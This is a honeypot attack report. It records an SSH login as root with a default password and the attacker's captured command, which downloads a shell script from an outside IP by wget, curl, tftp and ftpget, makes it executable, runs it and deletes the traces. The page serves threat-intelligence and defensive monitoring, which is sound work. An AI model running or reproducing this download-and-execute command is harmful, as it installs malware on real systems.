Attack Report for Observation

Header

Time

2022/07/27, 22:53:05 (GMT)

Transaction ID

F1M8V30UHUO61R8K

Service

ssh

Location

FR (France)

Attacker

145.239.11.61

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content

145.239.11.61 client username 'root' and password 'default' entered
145.239.11.61 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.187.87.141/catvsdog.sh; curl -O http://37.187.87.141/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 37.187.87.141 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 37.187.87.141; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 37.187.87.141 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh;'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate